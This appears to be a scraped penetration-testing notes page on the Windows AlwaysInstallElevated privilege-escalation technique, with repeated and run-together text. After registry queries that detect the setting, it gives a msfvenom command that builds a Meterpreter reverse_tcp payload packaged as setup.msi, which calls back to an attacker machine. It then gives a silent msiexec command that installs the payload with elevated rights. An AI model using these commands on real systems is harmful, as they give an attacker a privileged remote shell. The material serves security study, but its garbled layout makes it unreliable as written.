AlwaysInstallElevated

HKLM -> refer to all settings in register for whole **machine**
HKCU -> refer to all settings in register for **user**Detection




Last updated

HKLM -> refer to all settings in register for whole **machine**
HKCU -> refer to all settings in register for **user**



Last updated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
# reg query -> use to read information from register
# \Software\Policies\Microsoft\Windows\Installer -> path in register which have all windows installer settingsreg query HKCU\Software\Policies\Microsoft\Windows\Installermsfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msimsiexec /quiet /qn /i C:\Temp\setup.msi